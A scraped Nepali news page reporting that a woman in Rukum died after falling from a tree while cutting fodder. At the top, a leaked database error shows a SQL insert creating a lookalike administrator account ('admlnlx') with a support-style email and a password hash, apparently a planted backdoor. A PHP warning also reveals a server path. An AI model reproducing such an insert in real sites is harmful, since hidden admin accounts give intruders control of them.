WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3Nt047Hoso8fxEAVsE7P9pxQ1rCNA0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 13:11:18', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
घाँस काट्दा महिलाको रूखबाट लडेर मृत्यु – Gaule Khabar

घाँस काट्दा महिलाको रूखबाट लडेर मृत्यु

घाँस काट्दा महिलाको रूखबाट लडेर मृत्यु

रुकुम, पुस २८–

घाँस काट्न रूखमा चढेकी एक महिलाको लडेर मृत्यु भएको छ ।

रुकुमको सिम्ली–१ की अन्दाजी ३४ वर्षीया देउरुपा खड्काको रूखबाट लडेर मृत्यु भएको हो । गाईवस्तुका लागि घाँस काट्न रूखमा चढेकी खड्का मङ्गलबार लडेर गम्भीर घाइते हुनुभएको थियो ।

उहाँलाई जिल्ला अस्पताल सल्लेमा उपचार सम्भव नभएपछि थप उपचारका लागि नेपालगन्ज रिफर गरिएको भए पनि त्यहाँ उपचार हुन नसकेर काठमाडौँ लगिएकोमा बुधबार उहाँको मृत्यु भएको स्थानीयवासी रमेश डाँगीले जानकारी दिनुभयो । मृतक खड्कालाई टाउको र ढाडमा चोट लागेको उहाँले बताउनुभयो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका